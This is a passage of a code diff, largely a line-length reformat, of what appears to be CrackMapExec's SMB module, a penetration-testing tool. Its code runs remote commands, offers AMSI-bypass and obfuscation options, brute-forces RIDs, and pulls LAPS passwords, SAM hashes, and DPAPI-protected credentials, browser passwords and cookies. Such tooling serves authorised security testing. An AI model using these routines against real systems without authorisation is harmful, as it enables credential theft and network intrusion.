help="dump password policy" - ) + egroup.add_argument("--pass-pol", action="store_true", help="dump password policy") egroup.add_argument( "--rid-brute", nargs="?", @@ -350,9 +325,7 @@ class smb(connection): metavar="MAX_RID", help="enumerate users by bruteforcing RID's (default: 4000)", ) - egroup.add_argument( - "--wmi", metavar="QUERY", type=str, help="issues the specified WMI query" - ) + egroup.add_argument("--wmi", metavar="QUERY", type=str, help="issues the specified WMI query") egroup.add_argument( "--wmi-namespace", metavar="NAMESPACE", @@ -360,12 +333,8 @@ class smb(connection): help="WMI Namespace (default: root\\cimv2)", ) - sgroup = smb_parser.add_argument_group( - "Spidering", "Options for spidering shares" - ) - sgroup.add_argument( - "--spider", metavar="SHARE", type=str, help="share to spider" - ) + sgroup = smb_parser.add_argument_group("Spidering", "Options for spidering shares") + sgroup.add_argument("--spider", metavar="SHARE", type=str, help="share to spider") sgroup.add_argument( "--spider-folder", metavar="FOLDER", @@ -373,9 +342,7 @@ class smb(connection): type=str, help="folder to spider (default: root share directory)", ) - sgroup.add_argument( - "--content", action="store_true", help="enable file content searching" - ) + sgroup.add_argument("--content", action="store_true", help="enable file content searching") sgroup.add_argument( "--exclude-dirs", type=str, @@ -400,13 +367,9 @@ class smb(connection): default=None, help="max spider recursion depth (default: infinity & beyond)", ) - sgroup.add_argument( - "--only-files", action="store_true", help="only spider files" - ) + sgroup.add_argument("--only-files", 
action="store_true", help="only spider files") - tgroup = smb_parser.add_argument_group( - "Files", "Options for put and get remote files" - ) + tgroup = smb_parser.add_argument_group("Files", "Options for put and get remote files") tgroup.add_argument( "--put-file", nargs=2, @@ -425,9 +388,7 @@ class smb(connection): help="append the host to the get-file filename", ) - cgroup = smb_parser.add_argument_group( - "Command Execution", "Options for executing commands" - ) + cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands") cgroup.add_argument( "--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, @@ -437,20 +398,14 @@ class smb(connection): cgroup.add_argument( "--codec", default="utf-8", - help="Set encoding used (codec) from the target's output (default " - '"utf-8"). If errors are detected, run chcp.com at the target, ' - "map the result with " - "https://docs.python.org/3/library/codecs.html#standard-encodings and then execute " - "again with --codec and the corresponding codec", + help="Set encoding used (codec) from the target's output (default " '"utf-8"). If errors are detected, run chcp.com at the target, ' "map the result with " "https://docs.python.org/3/library/codecs.html#standard-encodings and then execute " "again with --codec and the corresponding codec", ) cgroup.add_argument( "--force-ps32", action="store_true", help="force the PowerShell command to run in a 32-bit process", ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") cegroup = cgroup.add_mutually_exclusive_group() cegroup.add_argument( "-x", @@ -464,12 +419,8 @@ class smb(connection): dest="ps_execute", help="execute the specified PowerShell command", ) - psgroup = smb_parser.add_argument_group( - "Powershell Obfuscation", "Options for PowerShell script obfuscation" - ) - psgroup.add_argument( - "--obfs", action="store_true", help="Obfuscate PowerShell scripts" - ) + psgroup = smb_parser.add_argument_group("Powershell Obfuscation", "Options for PowerShell script obfuscation") + psgroup.add_argument("--obfs", action="store_true", help="Obfuscate PowerShell scripts") psgroup.add_argument( "--amsi-bypass", nargs=1, @@ -533,9 +484,7 @@ class smb(connection): self.no_ntlm = True pass - self.domain = ( - self.conn.getServerDNSDomainName() if not self.no_ntlm else self.args.domain - ) + self.domain = self.conn.getServerDNSDomainName() if not self.no_ntlm else self.args.domain self.hostname = self.conn.getServerName() if not self.no_ntlm else self.host self.server_os = self.conn.getServerOS() self.logger.extra["hostname"] = self.hostname @@ -544,19 +493,13 @@ class smb(connection): self.server_os = self.server_os.decode("utf-8") try: - self.signing = ( - self.conn.isSigningRequired() - if self.smbv1 - else self.conn._SMBConnection._Connection["RequireSigning"] - ) + self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection["RequireSigning"] except Exception as e: self.logger.debug(e) pass self.os_arch = self.get_os_arch() - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") if not self.domain: @@ 
-614,20 +557,14 @@ class smb(connection): return False - search_filter = ( - "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" - + self.hostname - + "))" - ) + search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))" attributes = [ "msLAPS-EncryptedPassword", "msLAPS-Password", "ms-MCS-AdmPwd", "sAMAccountName", ] - results = connection.search( - searchFilter=search_filter, attributes=attributes, sizeLimit=0 - ) + results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0) msMCSAdmPwd = "" sAMAccountName = "" @@ -635,19 +572,12 @@ class smb(connection): from impacket.ldap import ldapasn1 as ldapasn1_impacket - results = [ - r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry) - ] + results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)] if len(results) != 0: for host in results: - values = { - str(attr["type"]).lower(): str(attr["vals"][0]) - for attr in host["attributes"] - } + values = {str(attr["type"]).lower(): str(attr["vals"][0]) for attr in host["attributes"]} if "mslaps-encryptedpassword" in values: - self.logger.fail( - "LAPS password is encrypted and currently CrackMapExec doesn't support the decryption..." - ) + self.logger.fail("LAPS password is encrypted and currently CrackMapExec doesn't support the decryption...") return False elif "mslaps-password" in values: r = loads(values["mslaps-password"]) @@ -656,16 +586,10 @@ class smb(connection): elif "ms-mcs-admpwd" in values: msMCSAdmPwd = values["ms-mcs-admpwd"] else: - self.logger.fail( - "No result found with attribute ms-MCS-AdmPwd or msLAPS-Password" - ) - logging.debug( - f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}" - ) + self.logger.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password") + logging.debug(f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}") else: - self.logger.fail( - f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}" - ) + self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}") return False @@ -673,9 +597,7 @@ class smb(connection): self.password = msMCSAdmPwd if msMCSAdmPwd == "": - self.logger.fail( - f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}" - ) + self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}") return False if ntlm_hash: @@ -688,13 +610,9 @@ class smb(connection): return True def print_host_info(self): - self.logger.display( - f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})" - ) + self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})") if self.args.laps: - return self.laps_search( - self.args.username, self.args.password, self.args.hash, self.domain - ) + return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain) return True def kerberos_login( @@ -737,9 +655,7 @@ class smb(connection): kerb_pass = next(s for s in [self.nthash, password, aesKey] if s) else: kerb_pass = "" - self.logger.debug( - f"Attempting to do Kerberos Login with 
useCache: {useCache}" - ) + self.logger.debug(f"Attempting to do Kerberos Login with useCache: {useCache}") self.conn.kerberosLogin( username, @@ -758,9 +674,7 @@ class smb(connection): else: self.username = username - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" else: self.plaintext_login(username, password, self.host) return @@ -789,15 +703,11 @@ class smb(connection): self.logger.fail(f"CCache Error: {e}") return False except OSError as e: - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" self.logger.fail(f"{domain}\\{self.username}{used_ccache} {e}") except (SessionError, Exception) as e: error, desc = e.getErrorString() - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" self.logger.fail( f"{domain}\\{self.username}{used_ccache} {error} {f'({desc})' if self.args.verbose else ''}", color="magenta" if error in smb_error_status else "red", @@ -821,21 +731,15 @@ class smb(connection): self.logger.fail(f"Broken Pipe Error while attempting to login") self.check_if_admin() - self.logger.debug( - f"Adding credential: {domain}/{self.username}:{self.password}" - ) + self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}") self.db.add_credential("plaintext", domain, self.username, self.password) - user_id = self.db.get_credential( - "plaintext", domain, self.username, self.password - ) + user_id = self.db.get_credential("plaintext", domain, self.username, self.password) host_id = self.db.get_hosts(self.host)[0].id self.db.add_loggedin_relation(user_id, host_id) if self.admin_privs: - self.logger.debug( - f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}" - ) + self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}") self.db.add_admin_user( "plaintext", domain, @@ -907,9 +811,7 @@ class smb(connection): self.db.add_loggedin_relation(user_id, host_id) if self.admin_privs: - self.db.add_admin_user( - "hash", domain, self.username, nthash, self.host, user_id=user_id - ) + self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id) out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}" self.logger.success(out) @@ -952,14 +854,10 @@ class smb(connection): self.smbv1 = True except socket.error as e: if str(e).find("Connection reset by peer") != -1: - self.logger.info( - f"SMBv1 might be disabled on {self.host if not kdc else kdc}" - ) + self.logger.info(f"SMBv1 might be disabled on {self.host if not kdc else kdc}") return False except (Exception, NetBIOSTimeout) as e: - self.logger.info( - f"Error creating SMBv1 connection to {self.host if not kdc else kdc}: {e}" - ) + self.logger.info(f"Error creating SMBv1 connection to {self.host if not kdc else kdc}: {e}") return False return True @@ -976,14 +874,10 @@ class smb(connection): self.smbv1 = False except socket.error as e: if str(e).find("Too many open files") != -1: - self.logger.fail( - f"SMBv3 connection error on {self.host if not kdc else kdc}: {e}" - ) + self.logger.fail(f"SMBv3 connection error on {self.host if not kdc else kdc}: {e}") return False except (Exception, NetBIOSTimeout) as e: - self.logger.info( - f"Error creating SMBv3 connection to 
{self.host if not kdc else kdc}: {e}" - ) + self.logger.info(f"Error creating SMBv3 connection to {self.host if not kdc else kdc}: {e}") return False return True @@ -995,9 +889,7 @@ class smb(connection): return False def check_if_admin(self): - rpctransport = SMBTransport( - self.conn.getRemoteHost(), 445, r"\svcctl", smb_connection=self.conn - ) + rpctransport = SMBTransport(self.conn.getRemoteHost(), 445, r"\svcctl", smb_connection=self.conn) dce = rpctransport.get_dce_rpc() try: dce.connect() @@ -1008,9 +900,7 @@ class smb(connection): try: # 0xF003F - SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx - ans = scmr.hROpenSCManagerW( - dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F - ) + ans = scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F) self.admin_privs = True except scmr.DCERPCException: self.admin_privs = False @@ -1041,9 +931,7 @@ class smb(connection): if method == "wmiexec": try: exec_method = WMIEXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.username, self.password, @@ -1054,6 +942,7 @@ class smb(connection): self.kdcHost, self.hash, self.args.share, + logger=self.logger ) self.logger.info("Executed command via wmiexec") break @@ -1064,9 +953,7 @@ class smb(connection): elif method == "mmcexec": try: exec_method = MMCEXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.username, self.password, @@ -1083,9 +970,7 @@ class smb(connection): elif method == "atexec": try: exec_method = TSCH_EXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.username, self.password, @@ -1104,9 +989,7 @@ class smb(connection): elif method == "smbexec": try: exec_method = SMBEXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." 
+ self.domain, self.smb_share_name, self.conn, self.args.port, @@ -1118,6 +1001,7 @@ class smb(connection): self.kdcHost, self.hash, self.args.share, + self.logger ) self.logger.info("Executed command via smbexec") break @@ -1135,18 +1019,14 @@ class smb(connection): if not isinstance(output, str): output = output.decode(self.args.codec) except UnicodeDecodeError: - self.logger.debug( - "Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings" - ) + self.logger.debug("Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings") output = output.decode("cp437") output = output.strip() self.logger.debug(f"Output: {output}") if self.args.execute or self.args.ps_execute: - self.logger.success( - f"Executed command {self.args.exec_method if self.args.exec_method else ''}" - ) + self.logger.success(f"Executed command {self.args.exec_method if self.args.exec_method else ''}") buf = StringIO(output).readlines() for line in buf: self.logger.highlight(line.strip()) @@ -1205,9 +1085,7 @@ class smb(connection): try: self.logger.debug(f"domain: {self.domain}") - user_id = self.db.get_user( - self.domain.split(".")[0].upper(), self.username - )[0][0] + user_id = self.db.get_user(self.domain.split(".")[0].upper(), self.username)[0][0] except Exception as e: error = get_error_string(e) self.logger.fail(f"Error getting user: {error}") @@ -1261,9 +1139,7 @@ class smb(connection): if share_name != "IPC$": try: # TODO: check if this already exists in DB before adding - self.db.add_share( - self.hostname, user_id, share_name, share_remark, read, write - ) + self.db.add_share(self.hostname, user_id, share_name, share_remark, read, write) except Exception as e: error = get_error_string(e) self.logger.debug(f"Error adding share: {error}") @@ -1303,9 +1179,7 @@ class smb(connection): self.logger.display("Enumerated sessions") for session in sessions: if session.sesi10_cname.find(self.local_ip) == -1: - self.logger.highlight( - f"{session.sesi10_cname:<25} User:{session.sesi10_username}" - ) + self.logger.highlight(f"{session.sesi10_cname:<25} User:{session.sesi10_username}") return sessions except: pass @@ -1360,9 +1234,7 @@ class smb(connection): for group in groups: if group.name: if not self.args.local_groups: - self.logger.highlight( - f"{group.name:<40} membercount: {group.membercount}" - ) + self.logger.highlight(f"{group.name:<40} membercount: {group.membercount}") group_id = self.db.add_group( self.hostname, group.name, @@ -1376,7 +1248,9 @@ class smb(connection): group_id = self.db.get_groups( group_name=self.args.local_groups, group_domain=domain, - )[0][0] + )[ + 0 + ][0] except IndexError: group_id = self.db.add_group( domain, @@ -1388,13 +1262,9 @@ class smb(connection): # So I put a domain group as a member of a local group which is also a member of another local group. 
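# A minimal sketch (not a diff line) of the "look up, else insert" pattern the surrounding
# group-enumeration hunks use when resolving a group id, assuming a db object exposing the
# get_groups()/add_group() helpers with the signatures that appear elsewhere in this diff
# (get_groups() returns rows whose first column is the id; add_group() returns a list
# containing the new id):
def get_or_add_group_id(db, domain, name):
    try:
        # first row, first column is the existing group id
        return db.get_groups(group_name=name, group_domain=domain)[0][0]
    except IndexError:
        # no matching group yet: insert it and use the returned id
        return db.add_group(domain, name)[0]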
# (╯°□°)╯︵ ┻━┻ if not group.isgroup: - self.db.add_credential( - "plaintext", domain, name, "", group_id, "" - ) + self.db.add_credential("plaintext", domain, name, "", group_id, "") elif group.isgroup: - self.db.add_group( - domain, name, member_count_ad=group.membercount - ) + self.db.add_group(domain, name, member_count_ad=group.membercount) break except Exception as e: self.logger.fail(f"Error enumerating local groups of {self.host}: {e}") @@ -1406,9 +1276,7 @@ class smb(connection): for group_name, group_rid in groups.items(): self.logger.highlight(f"rid => {group_rid} => {group_name}") - group_id = self.db.add_group( - self.hostname, group_name, rid=group_rid - )[0] + group_id = self.db.add_group(self.hostname, group_name, rid=group_rid)[0] self.logger.debug(f"Added group, returned id: {group_id}") return groups @@ -1453,17 +1321,15 @@ class smb(connection): self.logger.success("Enumerated members of domain group") for group in groups: - member_count = ( - len(group.member) if hasattr(group, "member") else 0 - ) - self.logger.highlight( - f"{group.memberdomain}\\{group.membername}" - ) + member_count = len(group.member) if hasattr(group, "member") else 0 + self.logger.highlight(f"{group.memberdomain}\\{group.membername}") try: group_id = self.db.get_groups( group_name=self.args.groups, group_domain=group.groupdomain, - )[0][0] + )[ + 0 + ][0] except IndexError: group_id = self.db.add_group( group.groupdomain, @@ -1487,9 +1353,7 @@ class smb(connection): )[0] break except Exception as e: - self.logger.fail( - f"Error enumerating domain group members using dc ip {dc_ip}: {e}" - ) + self.logger.fail(f"Error enumerating domain group members using dc ip {dc_ip}: {e}") else: try: groups = get_netgroup( @@ -1511,12 +1375,8 @@ class smb(connection): self.logger.success("Enumerated domain group(s)") for group in groups: - member_count = ( - len(group.member) if hasattr(group, "member") else 0 - ) - self.logger.highlight( - f"{group.samaccountname:<40} membercount: {member_count}" - ) + member_count = len(group.member) if hasattr(group, "member") else 0 + self.logger.highlight(f"{group.samaccountname:<40} membercount: {member_count}") if bool(group.isgroup) is True: # Since there isn't a groupmember attribute on the returned object from get_netgroup @@ -1529,9 +1389,7 @@ class smb(connection): )[0] break except Exception as e: - self.logger.fail( - f"Error enumerating domain group using dc ip {dc_ip}: {e}" - ) + self.logger.fail(f"Error enumerating domain group using dc ip {dc_ip}: {e}") return groups def users(self): @@ -1561,9 +1419,7 @@ class smb(connection): self.logger.highlight(f"{domain}\\{host_clean:<30}") break except Exception as e: - self.logger.fail( - f"Error enumerating domain hosts using dc ip {dc_ip}: {e}" - ) + self.logger.fail(f"Error enumerating domain hosts using dc ip {dc_ip}: {e}") break return hosts @@ -1582,14 +1438,10 @@ class smb(connection): if self.args.loggedon_users_filter: for user in logged_on: if re.match(self.args.loggedon_users_filter, user.wkui1_username): - self.logger.highlight( - f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}" - ) + self.logger.highlight(f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}") else: for user in logged_on: - self.logger.highlight( - f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server 
else ''}" - ) + self.logger.highlight(f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}") except Exception as e: self.logger.fail(f"Error enumerating logged on users: {e}") return logged_on @@ -1614,13 +1466,9 @@ class smb(connection): rpc._create_wmi_connection(namespace=namespace) if wmi_query: - query = rpc._wmi_connection.ExecQuery( - wmi_query, lFlags=WBEM_FLAG_FORWARD_ONLY - ) + query = rpc._wmi_connection.ExecQuery(wmi_query, lFlags=WBEM_FLAG_FORWARD_ONLY) else: - query = rpc._wmi_connection.ExecQuery( - self.args.wmi, lFlags=WBEM_FLAG_FORWARD_ONLY - ) + query = rpc._wmi_connection.ExecQuery(self.args.wmi, lFlags=WBEM_FLAG_FORWARD_ONLY) except Exception as e: self.logger.fail(f"Error creating WMI connection: {e}") return records @@ -1668,9 +1516,7 @@ class smb(connection): self.args.only_files, ) else: - spider.spider( - share, folder, pattern, regex, exclude_dirs, depth, content, only_files - ) + spider.spider(share, folder, pattern, regex, exclude_dirs, depth, content, only_files) self.logger.display(f"Done spidering (Completed in {time() - start_time})") @@ -1688,9 +1534,7 @@ class smb(connection): } try: - full_hostname = ( - self.host if not self.kerberos else self.hostname + "." + self.domain - ) + full_hostname = self.host if not self.kerberos else self.hostname + "." + self.domain string_binding = KNOWN_PROTOCOLS[self.args.port]["bindstr"] logging.debug(f"StringBinding {string_binding}") rpc_transport = transport.DCERPCTransportFactory(string_binding) @@ -1701,9 +1545,7 @@ class smb(connection): if hasattr(rpc_transport, "set_credentials"): # This method exists only for selected protocol sequences. - rpc_transport.set_credentials( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) if self.kerberos: rpc_transport.set_kerberos(self.kerberos, self.kdcHost) @@ -1726,9 +1568,7 @@ class smb(connection): dce.bind(lsat.MSRPC_UUID_LSAT) try: - resp = lsad.hLsarOpenPolicy2( - dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES - ) + resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES) except lsad.DCERPCSessionError as e: self.logger.fail(f"Error connecting: {e}") return entries @@ -1740,9 +1580,7 @@ class smb(connection): policy_handle, lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation, ) - domain_sid = resp["PolicyInformation"]["PolicyAccountDomainInfo"][ - "DomainSid" - ].formatCanonical() + domain_sid = resp["PolicyInformation"]["PolicyAccountDomainInfo"]["DomainSid"].formatCanonical() so_far = 0 simultaneous = 1000 @@ -1759,9 +1597,7 @@ class smb(connection): for i in range(so_far, so_far + sids_to_check): sids.append(f"{domain_sid}-{i:d}") try: - lsat.hLsarLookupSids( - dce, policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta - ) + lsat.hLsarLookupSids(dce, policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta) except DCERPCException as e: if str(e).find("STATUS_NONE_MAPPED") >= 0: so_far += simultaneous @@ -1774,9 +1610,7 @@ class smb(connection): for n, item in enumerate(resp["TranslatedNames"]["Names"]): if item["Use"] != SID_NAME_USE.SidTypeUnknown: rid = so_far + n - domain = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]][ - "Name" - ] + domain = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]]["Name"] user = item["Name"] sid_type = SID_NAME_USE.enumItems(item["Use"]).name self.logger.highlight(f"{rid}: 
{domain}\\{user} ({sid_type})") @@ -1793,31 +1627,23 @@ class smb(connection): return entries def put_file(self): - self.logger.display( - f"Copying {self.args.put_file[0]} to {self.args.put_file[1]}" - ) + self.logger.display(f"Copying {self.args.put_file[0]} to {self.args.put_file[1]}") with open(self.args.put_file[0], "rb") as file: try: self.conn.putFile(self.args.share, self.args.put_file[1], file.read) - self.logger.success( - f"Created file {self.args.put_file[0]} on \\\\{self.args.share}\\{self.args.put_file[1]}" - ) + self.logger.success(f"Created file {self.args.put_file[0]} on \\\\{self.args.share}\\{self.args.put_file[1]}") except Exception as e: self.logger.fail(f"Error writing file to share {self.args.share}: {e}") def get_file(self): - self.logger.display( - f"Copying {self.args.get_file[0]} to {self.args.get_file[1]}" - ) + self.logger.display(f"Copying {self.args.get_file[0]} to {self.args.get_file[1]}") file_handle = self.args.get_file[1] if self.args.append_host: file_handle = f"{self.hostname}-{self.args.get_file[1]}" with open(file_handle, "wb+") as file: try: self.conn.getFile(self.args.share, self.args.get_file[0], file.write) - self.logger.success( - f"File {self.args.get_file[0]} was transferred to {file_handle}" - ) + self.logger.success(f"File {self.args.get_file[0]} was transferred to {file_handle}") except Exception as e: self.logger.fail(f"Error reading file {self.args.share}: {e}") @@ -1862,9 +1688,7 @@ class smb(connection): self.logger.display("Dumping SAM hashes") SAM.dump() SAM.export(self.output_filename) - self.logger.success( - f"Added {highlight(add_sam_hash.sam_hashes)} SAM hashes to the database" - ) + self.logger.success(f"Added {highlight(add_sam_hash.sam_hashes)} SAM hashes to the database") try: self.remote_ops.finish() @@ -1890,11 +1714,7 @@ class smb(connection): except Exception as e: self.logger.fail(str(e)) - if ( - self.pvkbytes is None - and self.no_da is None - and self.args.local_auth is False - ): + if self.pvkbytes is None and self.no_da is None and self.args.local_auth is False: try: results = self.db.get_domain_backupkey(self.domain) except: @@ -1923,12 +1743,8 @@ class smb(connection): dc_conn = DPLootSMBConnection(dc_target) dc_conn.connect() # Connect to DC if dc_conn.is_admin(): - self.logger.success( - "User is Domain Administrator, exporting domain backupkey..." 
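# A rough sketch (not a diff line) of the domain backup-key caching flow used in this DPAPI
# section, assuming the db helpers and the dploot BackupkeyTriage usage shown in this diff
# (get_domain_backupkey() yields (id, domain, pvk_bytes) rows; triage_backupkey().backupkey_v2
# is the raw key that gets stored via add_domain_backupkey()):
def get_domain_backupkey_cached(db, domain, dc_target, dc_conn, BackupkeyTriage):
    rows = db.get_domain_backupkey(domain)
    if rows:
        return rows[0][2]      # reuse the key already stored for this domain
    if dc_conn.is_admin():     # exporting the key requires admin rights on the DC
        key = BackupkeyTriage(target=dc_target, conn=dc_conn).triage_backupkey().backupkey_v2
        db.add_domain_backupkey(domain, key)
        return key
    return None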
- ) - backupkey_triage = BackupkeyTriage( - target=dc_target, conn=dc_conn - ) + self.logger.success("User is Domain Administrator, exporting domain backupkey...") + backupkey_triage = BackupkeyTriage(target=dc_target, conn=dc_conn) backupkey = backupkey_triage.triage_backupkey() self.pvkbytes = backupkey.backupkey_v2 self.db.add_domain_backupkey(self.domain, self.pvkbytes) @@ -1958,16 +1774,8 @@ class smb(connection): self.logger.debug(f"Could not upgrade connection: {e}") return - plaintexts = { - username: password - for _, _, username, password, _, _ in self.db.get_credentials( - cred_type="plaintext" - ) - } - nthashes = { - username: nt.split(":")[1] if ":" in nt else nt - for _, _, username, nt, _, _ in self.db.get_credentials(cred_type="hash") - } + plaintexts = {username: password for _, _, username, password, _, _ in self.db.get_credentials(cred_type="plaintext")} + nthashes = {username: nt.split(":")[1] if ":" in nt else nt for _, _, username, nt, _, _ in self.db.get_credentials(cred_type="hash")} if self.password != "": plaintexts[self.username] = self.password if self.nthash != "": @@ -1975,9 +1783,7 @@ class smb(connection): # Collect User and Machine masterkeys try: - self.logger.display( - "Collecting User and Machine masterkeys, grab a coffee and be patient..." - ) + self.logger.display("Collecting User and Machine masterkeys, grab a coffee and be patient...") masterkeys_triage = MasterkeysTriage( target=target, conn=conn, @@ -1995,15 +1801,11 @@ class smb(connection): logging.fail("No masterkeys looted") return - self.logger.success( - f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets..." - ) + self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...") try: # Collect User and Machine Credentials Manager secrets - credentials_triage = CredentialsTriage( - target=target, conn=conn, masterkeys=masterkeys - ) + credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys) self.logger.debug(f"Credentials Triage Object: {credentials_triage}") credentials = credentials_triage.triage_credentials() self.logger.debug(f"Triaged Credentials: {credentials}") @@ -2013,9 +1815,7 @@ class smb(connection): self.logger.debug(f"Error while looting credentials: {e}") for credential in credentials: - self.logger.highlight( - f"[{credential.winuser}][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[{credential.winuser}][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, "CREDENTIAL", @@ -2025,9 +1825,7 @@ class smb(connection): credential.target, ) for credential in system_credentials: - self.logger.highlight( - f"[SYSTEM][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[SYSTEM][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, "CREDENTIAL", @@ -2040,19 +1838,13 @@ class smb(connection): try: # Collect Chrome Based Browser stored secrets dump_cookies = True if self.args.dpapi == "cookies" else False - browser_triage = BrowserTriage( - target=target, conn=conn, masterkeys=masterkeys - ) - browser_credentials, cookies = browser_triage.triage_browsers( - gather_cookies=dump_cookies - ) + browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys) + browser_credentials, cookies = 
browser_triage.triage_browsers(gather_cookies=dump_cookies) except Exception as e: self.logger.debug(f"Error while looting browsers: {e}") for credential in browser_credentials: cred_url = credential.url + " -" if credential.url != "" else "-" - self.logger.highlight( - f"[{credential.winuser}][{credential.browser.upper()}] {cred_url} {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[{credential.winuser}][{credential.browser.upper()}] {cred_url} {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, credential.browser.upper(), @@ -2065,25 +1857,19 @@ class smb(connection): if dump_cookies: self.logger.display("Start Dumping Cookies") for cookie in cookies: - self.logger.highlight( - f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}" - ) + self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}") self.logger.display("End Dumping Cookies") try: # Collect User Internet Explorer stored secrets - vaults_triage = VaultsTriage( - target=target, conn=conn, masterkeys=masterkeys - ) + vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys) vaults = vaults_triage.triage_vaults() except Exception as e: self.logger.debug(f"Error while looting vaults: {e}") for vault in vaults: if vault.type == "Internet Explorer": resource = vault.resource + " -" if vault.resource != "" else "-" - self.logger.highlight( - f"[{vault.winuser}][IEX] {resource} - {vault.username}:{vault.password}" - ) + self.logger.highlight(f"[{vault.winuser}][IEX] {resource} - {vault.username}:{vault.password}") self.db.add_dpapi_secrets( target.address, "IEX", @@ -2101,9 +1887,7 @@ class smb(connection): self.logger.debug(f"Error while looting firefox: {e}") for credential in firefox_credentials: url = credential.url + " -" if credential.url != "" else "-" - self.logger.highlight( - f"[{credential.winuser}][FIREFOX] {url} {credential.username}:{credential.password}" - ) + 